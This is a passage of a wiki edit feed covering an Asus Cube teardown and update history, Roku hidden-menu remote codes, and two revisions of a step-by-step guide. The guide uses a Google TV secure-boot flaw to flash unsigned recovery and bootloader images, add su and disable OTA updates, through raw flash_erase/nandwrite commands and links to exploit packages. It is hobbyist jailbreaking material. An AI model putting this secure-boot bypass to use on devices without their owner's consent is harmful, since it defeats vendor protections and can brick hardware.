&amp;lt;gallery&amp;gt;&lt;br /&gt;
File:Asus_cube_teardown1.jpg&lt;br /&gt;
File:Asus_cube_teardown2.jpg&lt;br /&gt;
File:Asus_cube_teardown3.jpg&lt;br /&gt;
File:Asus_cube_teardown4.jpg&lt;br /&gt;
File:Asus_cube_teardown5.jpg&lt;br /&gt;
File:Asus_cube_teardown6.jpg&lt;br /&gt;
File:Asus_cube_teardown7.jpg&lt;br /&gt;
File:Asus_cube_teardown8.jpg&lt;br /&gt;
File:Asus_cube_teardown9.jpg&lt;br /&gt;
File:Asus_cube_teardown10.jpg&lt;br /&gt;
File:Asus_cube_teardown11.jpg&lt;br /&gt;
File:Asus_cube_teardown12.jpg&lt;br /&gt;
File:Asus_cube_teardown13.jpg&lt;br /&gt;
File:Asus_cube_teardown14.jpg&lt;br /&gt;
File:Asus_cube_teardown15.jpg&lt;br /&gt;
File:Asus_cube_teardown16.jpg&lt;br /&gt;
File:Asus_cube_teardown17.jpg&lt;br /&gt;
File:Asus_cube_teardown18.jpg&lt;br /&gt;
File:Asus_cube_teardown19.jpg&lt;br /&gt;
File:Asus_cube_teardown20.jpg&lt;br /&gt;
&amp;lt;/gallery&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Update History ==&lt;br /&gt;
*MASTER.20130115.133219 (01/15/2013) - Launch version, shipped on the box. Box is branded as the &amp;quot;Asus Qube&amp;quot;&lt;br /&gt;
*MASTER.20130327.094230 - First OTA (04/24/2013). Rebrands the box as &amp;quot;Cube&amp;quot;, adds Voice Search and additional apps [http://android.clients.google.com/packages/ota/asus_buddybox/145f690316be.asus_google_cube-ota-20130327.110723.zip Download]&lt;br /&gt;
*MASTER.20130523.021406 - Second OTA (05/23/2013). Adds Amazon instant video [http://android.clients.google.com/packages/ota/asus_buddybox/820fef142e1d.asus_google_cube-ota-20130523.021406.zip Download]&lt;br /&gt;
*MASTER.20131023.164739 - Adds VUDU support [http://android.clients.google.com/packages/ota/asus_buddybox/f709b679f477da791897a72af199eea9fe604f70.asus_google_cube-ota-20131023.180530.zip Download]&lt;br /&gt;
&lt;br /&gt;
== Connections / Connectors / Switches ==&lt;br /&gt;
*J2 - SPI ?&lt;br /&gt;
*UART1 - UART (115200 8n1)&lt;br /&gt;
*UART2&lt;br /&gt;
*RF_CON - Remote Control Antenna Board &lt;br /&gt;
*WIFI_CON - WiFi / BT Antenna Board (SDIO) &lt;br /&gt;
*SW1 - Factory Reset&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Roku&amp;diff=1882</id>
		<title>Roku</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Roku&amp;diff=1882"/>
		<updated>2013-12-28T03:28:06Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Secret Screens */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__FORCETOC__&lt;br /&gt;
{{Disclaimer}}&lt;br /&gt;
[[File:Roku-pile.jpg|200px|left|thumb]]&lt;br /&gt;
[[Category:Roku]]&lt;br /&gt;
This page will be dedicated to a general overview of the Roku OS, descriptions, and information related to the Roku Streaming Player.&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device.&lt;br /&gt;
&lt;br /&gt;
== GPL ==&lt;br /&gt;
Roku maintains a fairly accurate (but far from perfect) repository of GPL code which can be found at [[http://www.roku.com/opensource roku.com/opensource]].&lt;br /&gt;
&lt;br /&gt;
== Secret Screens ==&lt;br /&gt;
{| cell-spacing=&amp;quot;2em&amp;quot;&lt;br /&gt;
|style=&amp;quot;padding-right:20px;&amp;quot;|&lt;br /&gt;
{|&lt;br /&gt;
! width=&amp;quot;300px&amp;quot;| Title&lt;br /&gt;
! style=&amp;quot;padding-left:20px; border-left:thin #000000;&amp;quot;| Code&lt;br /&gt;
|-&lt;br /&gt;
|Secret Settings Screen&lt;br /&gt;
|H - H - H - H - H - FF - FF - FF - RW - RW&lt;br /&gt;
|-&lt;br /&gt;
|Secret Settings Screen 2&lt;br /&gt;
|H - H - H - H - H - U - R - D - L - U&lt;br /&gt;
|-&lt;br /&gt;
|Channel Info/Installed Software Versions&lt;br /&gt;
|H - H  - H - U - U -  L -  R -  L - R - L&lt;br /&gt;
|-&lt;br /&gt;
|Developer Settings&lt;br /&gt;
|H - H - H - U - U - R - L - R - L - R&lt;br /&gt;
|-&lt;br /&gt;
|Quality Settings/Bitrate Override Screen&lt;br /&gt;
|H - H - H - H - H - RW - RW - RW - FF - FF&lt;br /&gt;
|-&lt;br /&gt;
|Wifi Secret Screen &lt;br /&gt;
|H - H - H - H - H - U - D - U - D - U&lt;br /&gt;
|-&lt;br /&gt;
|Platform Settings &lt;br /&gt;
|H - H - H - H - H - FF - P - RW -  P - FF&lt;br /&gt;
|-&lt;br /&gt;
|Antenna&lt;br /&gt;
|H - H - H - H -  H - FW - D - RW - D - FF &lt;br /&gt;
|-&lt;br /&gt;
|Reboot?&lt;br /&gt;
|H - H - H - H - H - U - RW - RW - FW - FW&lt;br /&gt;
|}&lt;br /&gt;
| style=&amp;quot;width:200px;&amp;quot; style=&amp;quot;padding-left:40px;vertical-align:middle;&amp;quot;| &lt;br /&gt;
{|&lt;br /&gt;
! Letter&lt;br /&gt;
! Key&lt;br /&gt;
|-&lt;br /&gt;
|U&lt;br /&gt;
|Up&lt;br /&gt;
|-&lt;br /&gt;
|L&lt;br /&gt;
|Left&lt;br /&gt;
|-&lt;br /&gt;
|R&lt;br /&gt;
|Right&lt;br /&gt;
|-&lt;br /&gt;
|D&lt;br /&gt;
|Down&lt;br /&gt;
|-&lt;br /&gt;
|B&lt;br /&gt;
|Back&lt;br /&gt;
|-&lt;br /&gt;
|H&lt;br /&gt;
|Home&lt;br /&gt;
|}&lt;br /&gt;
|style=&amp;quot;padding-left:40px; width:200px;vertical-align:middle;&amp;quot;| &lt;br /&gt;
{|&lt;br /&gt;
! Letter&lt;br /&gt;
! Key&lt;br /&gt;
|-&lt;br /&gt;
|RW&lt;br /&gt;
|Rewind&lt;br /&gt;
|-&lt;br /&gt;
|FF&lt;br /&gt;
|Fast Forward&lt;br /&gt;
|-&lt;br /&gt;
|P&lt;br /&gt;
|Play/Pause&lt;br /&gt;
|-&lt;br /&gt;
|RE&lt;br /&gt;
|Reset&lt;br /&gt;
|-&lt;br /&gt;
|O&lt;br /&gt;
|OK&lt;br /&gt;
|-&lt;br /&gt;
|A&lt;br /&gt;
|Asterisk (*)&lt;br /&gt;
|}&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Installing_Custom_Recovery_(Gen_2_Only)&amp;diff=1211</id>
		<title>Installing Custom Recovery (Gen 2 Only)</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Installing_Custom_Recovery_(Gen_2_Only)&amp;diff=1211"/>
		<updated>2013-08-15T00:53:08Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Developers Only (CUBE, PULSE) (UART console required) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== About ==&lt;br /&gt;
This custom recovery currently exploits a secure boot flaw in the second generation of Google TV devices to allow booting an unsigned kernel on the Google TV. Below we allow users to install a custom recovery on the Google TV which allows full read write access to the device as well as an automated process for installing updates (of which we do not check the signature.) &lt;br /&gt;
&lt;br /&gt;
== Devices ==&lt;br /&gt;
*ASUS Cube&lt;br /&gt;
*Hisense Pulse&lt;br /&gt;
*Sony NSZ-GS7/GS8&lt;br /&gt;
&lt;br /&gt;
== Warnings ==&lt;br /&gt;
*This will definitely void your warranty, if you want to keep your warranty please do not do any of the steps in this guide.&lt;br /&gt;
*This may brick your GTV. It shouldn&#039;t, but it still might!&lt;br /&gt;
&lt;br /&gt;
== Tools Needed ==&lt;br /&gt;
*Linux Live CD or Linux Installed&lt;br /&gt;
*A vulnerable Google TV device.&lt;br /&gt;
*1 USB Drive (to be formatted)&lt;br /&gt;
*1 USB Keyboard&lt;br /&gt;
&lt;br /&gt;
== Pre-Setup ==&lt;br /&gt;
#Boot Linux (Live CD or Install)&lt;br /&gt;
#Download Custom Recovery Package for Device&lt;br /&gt;
#Download GTVHacker SecureBoot update.zip&lt;br /&gt;
#Unzip Custom Recovery Package&lt;br /&gt;
&lt;br /&gt;
== Custom Recovery Steps (Cube and Pulse) ==&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/mtd for the recovery mtd.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-recovery c 90 32&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: nandwrite&lt;br /&gt;
#: flash_erase&lt;br /&gt;
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#To find out what USB drive you plugged in, issue this command:&lt;br /&gt;
#: &amp;lt;code&amp;gt;ls /mnt/media/&lt;br /&gt;
#: cd /mnt/media/usb.LABEL (where label = the rest from above)&amp;lt;/code&amp;gt;&lt;br /&gt;
#Now, issue these commands:&lt;br /&gt;
#: &amp;lt;code&amp;gt;cp flash_erase /data/local/tmp&lt;br /&gt;
#: cp nandwrite /data/local/tmp&lt;br /&gt;
#: chmod 755 /data/local/tmp/flash_erase&lt;br /&gt;
#: chmod 755 /data/local/tmp/nandwrite&lt;br /&gt;
#: cd /data/local/tmp&amp;lt;/code&amp;gt;&lt;br /&gt;
#Finally, to install the recovery (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;./flash_erase /mnt/media/usb.LABEL/gtvhacker-recovery 0 0&lt;br /&gt;
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-recovery /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin&amp;lt;/code&amp;gt;&lt;br /&gt;
#: Now the recovery is installed, but to prevent it from being overwritten and to add su you MUST do the following.&lt;br /&gt;
#Disconnect from adb and format a FAT32 drive.&lt;br /&gt;
#Copy GTVHacker-secureboot-update.zip to root of FAT32 drive.&lt;br /&gt;
#Rename GTVHacker-secureboot-update.zip to update.zip&lt;br /&gt;
#Unmount and eject FAT32 drive.&lt;br /&gt;
#Plug FAT32 Drive and USB Keyboard into Google TV&lt;br /&gt;
#On host PC enter in the following to boot GoogleTV into recovery mode.&lt;br /&gt;
#: &amp;lt;code&amp;gt;adb reboot recovery&amp;lt;/code&amp;gt;&lt;br /&gt;
#After entering GTVHacker recovery press 1 to install from update.zip.&lt;br /&gt;
#If install is successful, you will be prompted to press Q to exit.&lt;br /&gt;
&lt;br /&gt;
== Developers Only (CUBE, PULSE) (UART console required) ==&lt;br /&gt;
&#039;&#039;&#039; We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.&#039;&#039;&#039;&lt;br /&gt;
To install the uboot custom bootloader (developers only, UART console required):&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/mtd for the kernel mtd.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-kernel c 90 16&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: nandwrite&lt;br /&gt;
#: flash_erase&lt;br /&gt;
#: uboot-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#To find out what USB drive you plugged in, issue this command:&lt;br /&gt;
#: &amp;lt;code&amp;gt;ls /mnt/media/&lt;br /&gt;
#: cd /mnt/media/usb.LABEL (where label = the rest from above)&amp;lt;/code&amp;gt;&lt;br /&gt;
#Now, issue these commands:&lt;br /&gt;
#: &amp;lt;code&amp;gt;cp flash_erase /data/local/tmp&lt;br /&gt;
#: cp nandwrite /data/local/tmp&lt;br /&gt;
#: chmod 755 /data/local/tmp/flash_erase&lt;br /&gt;
#: chmod 755 /data/local/tmp/nandwrite&lt;br /&gt;
#: cd /data/local/tmp&amp;lt;/code&amp;gt;&lt;br /&gt;
#Finally, to install the custom bootloader (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;./flash_erase /mnt/media/usb.LABEL/gtvhacker-kernel 0 0&lt;br /&gt;
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-kernel /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.&lt;br /&gt;
*To then boot from USB (try other ports if its not detected):&lt;br /&gt;
 &amp;lt;code&amp;gt;usb start; fatload usb 0:1 0x01308000 zImage 20568700; go 0x01308000 &amp;lt;/code&amp;gt;&lt;br /&gt;
: 0x01308000 is the load address, zImage is the name of the file on a vfat formatted USB drive, and 20568700 is it&#039;s filesize&lt;br /&gt;
&lt;br /&gt;
== Custom Recovery Steps (Sony) ==&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/block for the recovery block.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-recovery b 179 10&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#To find out what USB drive you plugged in, issue this command:&lt;br /&gt;
#: &amp;lt;code&amp;gt;ls /mnt/media/&lt;br /&gt;
#: cd /mnt/media/usb.LABEL (where label = the rest from above)&amp;lt;/code&amp;gt;&lt;br /&gt;
#Install the recovery (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;&lt;br /&gt;
#: cp /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin /mnt/media/usb.LABEL/gtvhacker-recovery&amp;lt;/code&amp;gt;&lt;br /&gt;
#: Now the recovery is installed, but to prevent it from being overwritten and to add su you MUST do the following.&lt;br /&gt;
#Disconnect from adb and format a FAT32 drive.&lt;br /&gt;
#Copy GTVHacker-secureboot-update.zip to root of FAT32 drive.&lt;br /&gt;
#Rename GTVHacker-secureboot-update.zip to update.zip&lt;br /&gt;
#Unmount and eject FAT32 drive.&lt;br /&gt;
#Plug FAT32 Drive and USB Keyboard into Google TV&lt;br /&gt;
#On host PC enter in the following to boot GoogleTV into recovery mode.&lt;br /&gt;
#: &amp;lt;code&amp;gt;adb reboot recovery&amp;lt;/code&amp;gt;&lt;br /&gt;
#After entering GTVHacker recovery press 1 to install from update.zip.&lt;br /&gt;
#If install is successful, you will be prompted to press Q to exit.&lt;br /&gt;
&lt;br /&gt;
== Developers Only (SONY) (UART console required) ==&lt;br /&gt;
&#039;&#039;&#039; We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.&#039;&#039;&#039;&lt;br /&gt;
To install the uboot custom bootloader (developers only, UART console required):&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/mtd for the kernel mtd.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-kernel b 179 7&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: uboot-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#Install the custom bootloader (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;&lt;br /&gt;
#: cp /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin /mnt/media/usb.LABEL/gtvhacker-kernel&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.&lt;br /&gt;
*To then boot from USB (try other ports if its not detected):&lt;br /&gt;
 &amp;lt;code&amp;gt;usb start; fatload usb 0:1 0x01308000 zImage 20568700; go 0x01308000 &amp;lt;/code&amp;gt;&lt;br /&gt;
: 0x01308000 is the load address, zImage is the name of the file on a vfat formatted USB drive, and 20568700 is it&#039;s filesize&lt;br /&gt;
&lt;br /&gt;
== Troubleshooting ==&lt;br /&gt;
&lt;br /&gt;
*&#039;&#039;&#039;Help! By recovery doesn&#039;t persist after a reboot?!&#039;&#039;&#039;&lt;br /&gt;
: You must use the custom recovery to install the Secure Boot update.zip file for recovery to persist, otherwise it will be overwritten on the first normal boot. Installing this .zip puts a su binary on the box, installs the flash content bypass, kills OTA updates, and persists the recovery.&lt;br /&gt;
&lt;br /&gt;
*&#039;&#039;&#039;Recovery is saying that the update.zip file cannot be found.&#039;&#039;&#039;&lt;br /&gt;
: You must have the USB drive plugged in prior to booting the box and the USB drive must be FAT32 formatted. Use &amp;quot;fdisk -l&amp;quot; to verify the device has a correctly structured partition table.&lt;br /&gt;
&lt;br /&gt;
*You can get help from us or other users at:&lt;br /&gt;
&lt;br /&gt;
[http://forum.gtvhacker.com/ GTVHacker Forums]&lt;br /&gt;
&lt;br /&gt;
[http://www.gtvhacker.com GTVHacker Wiki]&lt;br /&gt;
&lt;br /&gt;
*or you can chat with us on IRC at:&lt;br /&gt;
&lt;br /&gt;
irc.freenode.net #gtvhacker&lt;br /&gt;
&lt;br /&gt;
[http://webchat.freenode.net/?randomnick=1&amp;amp;channels=gtvhacker&amp;amp;uio=d4 Freenode Webchat]&lt;br /&gt;
&lt;br /&gt;
(Someone may not be around right away to help, make sure to be willing to wait for a response)&lt;br /&gt;
&lt;br /&gt;
== Download ==&lt;br /&gt;
&#039;&#039;&#039;GTVHacker SecureBoot update.zip&#039;&#039;&#039;&lt;br /&gt;
*[http://download.gtvhacker.com/file/generic/GTVHacker-secureboot-update.zip SecureBoot Update.zip]&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Custom Recovery:&#039;&#039;&#039;&lt;br /&gt;
*[http://download.gtvhacker.com/file/asus/Asus_Cube_Secure_Boot_Exploit_Package-GTVHacker.zip Asus Cube Recovery]&lt;br /&gt;
*[http://download.gtvhacker.com/file/pulse/Hisense_Pulse_Secure_Boot_Exploit_Package-GTVHacker.zip Hisense Pulse Recovery]&lt;br /&gt;
*[http://download.gtvhacker.com/file/sony/Sony_NSZ-GS7-GS8_Secure_Boot_Exploit_Package-GTVHacker.zip Sony NSZ-GS7 and NSZ-GS8]&lt;/div&gt;</summary>
		<author><name>CJ</name></author>
	</entry>
	<entry>
		<id>https://wiki.exploitee.rs/index.php?title=Installing_Custom_Recovery_(Gen_2_Only)&amp;diff=1210</id>
		<title>Installing Custom Recovery (Gen 2 Only)</title>
		<link rel="alternate" type="text/html" href="https://wiki.exploitee.rs/index.php?title=Installing_Custom_Recovery_(Gen_2_Only)&amp;diff=1210"/>
		<updated>2013-08-15T00:52:19Z</updated>

		<summary type="html">&lt;p&gt;CJ: /* Developers Only (SONY) (UART console required) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== About ==&lt;br /&gt;
This custom recovery currently exploits a secure boot flaw in the second generation of Google TV devices to allow booting an unsigned kernel on the Google TV. Below we allow users to install a custom recovery on the Google TV which allows full read write access to the device as well as an automated process for installing updates (of which we do not check the signature.) &lt;br /&gt;
&lt;br /&gt;
== Devices ==&lt;br /&gt;
*ASUS Cube&lt;br /&gt;
*Hisense Pulse&lt;br /&gt;
*Sony NSZ-GS7/GS8&lt;br /&gt;
&lt;br /&gt;
== Warnings ==&lt;br /&gt;
*This will definitely void your warranty, if you want to keep your warranty please do not do any of the steps in this guide.&lt;br /&gt;
*This may brick your GTV. It shouldn&#039;t, but it still might!&lt;br /&gt;
&lt;br /&gt;
== Tools Needed ==&lt;br /&gt;
*Linux Live CD or Linux Installed&lt;br /&gt;
*A vulnerable Google TV device.&lt;br /&gt;
*1 USB Drive (to be formatted)&lt;br /&gt;
*1 USB Keyboard&lt;br /&gt;
&lt;br /&gt;
== Pre-Setup ==&lt;br /&gt;
#Boot Linux (Live CD or Install)&lt;br /&gt;
#Download Custom Recovery Package for Device&lt;br /&gt;
#Download GTVHacker SecureBoot update.zip&lt;br /&gt;
#Unzip Custom Recovery Package&lt;br /&gt;
&lt;br /&gt;
== Custom Recovery Steps (Cube and Pulse) ==&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/mtd for the recovery mtd.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-recovery c 90 32&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: nandwrite&lt;br /&gt;
#: flash_erase&lt;br /&gt;
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#To find out what USB drive you plugged in, issue this command:&lt;br /&gt;
#: &amp;lt;code&amp;gt;ls /mnt/media/&lt;br /&gt;
#: cd /mnt/media/usb.LABEL (where label = the rest from above)&amp;lt;/code&amp;gt;&lt;br /&gt;
#Now, issue these commands:&lt;br /&gt;
#: &amp;lt;code&amp;gt;cp flash_erase /data/local/tmp&lt;br /&gt;
#: cp nandwrite /data/local/tmp&lt;br /&gt;
#: chmod 755 /data/local/tmp/flash_erase&lt;br /&gt;
#: chmod 755 /data/local/tmp/nandwrite&lt;br /&gt;
#: cd /data/local/tmp&amp;lt;/code&amp;gt;&lt;br /&gt;
#Finally, to install the recovery (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;./flash_erase /mnt/media/usb.LABEL/gtvhacker-recovery 0 0&lt;br /&gt;
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-recovery /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin&amp;lt;/code&amp;gt;&lt;br /&gt;
#: Now the recovery is installed, but to prevent it from being overwritten and to add su you MUST do the following.&lt;br /&gt;
#Disconnect from adb and format a FAT32 drive.&lt;br /&gt;
#Copy GTVHacker-secureboot-update.zip to root of FAT32 drive.&lt;br /&gt;
#Rename GTVHacker-secureboot-update.zip to update.zip&lt;br /&gt;
#Unmount and eject FAT32 drive.&lt;br /&gt;
#Plug FAT32 Drive and USB Keyboard into Google TV&lt;br /&gt;
#On host PC enter in the following to boot GoogleTV into recovery mode.&lt;br /&gt;
#: &amp;lt;code&amp;gt;adb reboot recovery&amp;lt;/code&amp;gt;&lt;br /&gt;
#After entering GTVHacker recovery press 1 to install from update.zip.&lt;br /&gt;
#If install is successful, you will be prompted to press Q to exit.&lt;br /&gt;
&lt;br /&gt;
== Developers Only (CUBE, PULSE) (UART console required) ==&lt;br /&gt;
&#039;&#039;&#039; We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.&#039;&#039;&#039;&lt;br /&gt;
To install the uboot custom bootloader (developers only, UART console required):&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/mtd for the kernel mtd.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-kernel c 90 16&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: nandwrite&lt;br /&gt;
#: flash_erase&lt;br /&gt;
#: uboot-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#To find out what USB drive you plugged in, issue this command:&lt;br /&gt;
#: &amp;lt;code&amp;gt;ls /mnt/media/&lt;br /&gt;
#: cd /mnt/media/usb.LABEL (where label = the rest from above)&amp;lt;/code&amp;gt;&lt;br /&gt;
#Now, issue these commands:&lt;br /&gt;
#: &amp;lt;code&amp;gt;cp flash_erase /data/local/tmp&lt;br /&gt;
#: cp nandwrite /data/local/tmp&lt;br /&gt;
#: chmod 755 /data/local/tmp/flash_erase&lt;br /&gt;
#: chmod 755 /data/local/tmp/nandwrite&lt;br /&gt;
#: cd /data/local/tmp&amp;lt;/code&amp;gt;&lt;br /&gt;
#Finally, to install the custom bootloader (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;./flash_erase /mnt/media/usb.LABEL/gtvhacker-kernel 0 0&lt;br /&gt;
#: ./nandwrite -p /mnt/media/usb.LABEL/gtvhacker-mtd8 /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.&lt;br /&gt;
*To then boot from USB (try other ports if its not detected):&lt;br /&gt;
 &amp;lt;code&amp;gt;usb start; fatload usb 0:1 0x01308000 zImage 20568700; go 0x01308000 &amp;lt;/code&amp;gt;&lt;br /&gt;
: 0x01308000 is the load address, zImage is the name of the file on a vfat formatted USB drive, and 20568700 is it&#039;s filesize&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Custom Recovery Steps (Sony) ==&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/block for the recovery block.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-recovery b 179 10&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: CustomRecovery-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#To find out what USB drive you plugged in, issue this command:&lt;br /&gt;
#: &amp;lt;code&amp;gt;ls /mnt/media/&lt;br /&gt;
#: cd /mnt/media/usb.LABEL (where label = the rest from above)&amp;lt;/code&amp;gt;&lt;br /&gt;
#Install the recovery (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;&lt;br /&gt;
#: cp /mnt/media/usb.LABEL/CustomRecovery-VENDOR-MODEL-GTVHACKER.bin /mnt/media/usb.LABEL/gtvhacker-recovery&amp;lt;/code&amp;gt;&lt;br /&gt;
#: Now the recovery is installed, but to prevent it from being overwritten and to add su you MUST do the following.&lt;br /&gt;
#Disconnect from adb and format a FAT32 drive.&lt;br /&gt;
#Copy GTVHacker-secureboot-update.zip to root of FAT32 drive.&lt;br /&gt;
#Rename GTVHacker-secureboot-update.zip to update.zip&lt;br /&gt;
#Unmount and eject FAT32 drive.&lt;br /&gt;
#Plug FAT32 Drive and USB Keyboard into Google TV&lt;br /&gt;
#On host PC enter in the following to boot GoogleTV into recovery mode.&lt;br /&gt;
#: &amp;lt;code&amp;gt;adb reboot recovery&amp;lt;/code&amp;gt;&lt;br /&gt;
#After entering GTVHacker recovery press 1 to install from update.zip.&lt;br /&gt;
#If install is successful, you will be prompted to press Q to exit.&lt;br /&gt;
&lt;br /&gt;
== Developers Only (SONY) (UART console required) ==&lt;br /&gt;
&#039;&#039;&#039; We are preparing a update package to be installed from the recovery GUI which will automate the custom bootloader install.&#039;&#039;&#039;&lt;br /&gt;
To install the uboot custom bootloader (developers only, UART console required):&lt;br /&gt;
#Format a drive NTFS, and mount it.&lt;br /&gt;
#cd to the drive, and issue the following commands:&lt;br /&gt;
#: The major and minor hash for these commands is pulled from an &amp;quot;ls -l&amp;quot; on /dev/mtd for the kernel mtd.&lt;br /&gt;
#: &amp;lt;code&amp;gt;mknod gtvhacker-kernel b 179 7&amp;lt;/code&amp;gt;&lt;br /&gt;
#Then, copy over our files for your specific box, to the root of your NTFS flash drive&lt;br /&gt;
#: uboot-VENDOR-MODEL-GTVHACKER.bin&lt;br /&gt;
#Unmount the drive, and insert it into your Google TV.&lt;br /&gt;
#Connect via adb, and issue the shell command.&lt;br /&gt;
#Install the custom bootloader (where usb.LABEL is the name of your usb drive from above):&lt;br /&gt;
#: &amp;lt;code&amp;gt;&lt;br /&gt;
#: cp /mnt/media/usb-LABEL/uboot-VENDOR-MODEL-GTVHACKER.bin /mnt/media/usb.LABEL/gtvhacker-kernel&amp;lt;/code&amp;gt;&lt;br /&gt;
#Issue an adb reboot, and you have a custom DEVELOPER ONLY bootloader.&lt;br /&gt;
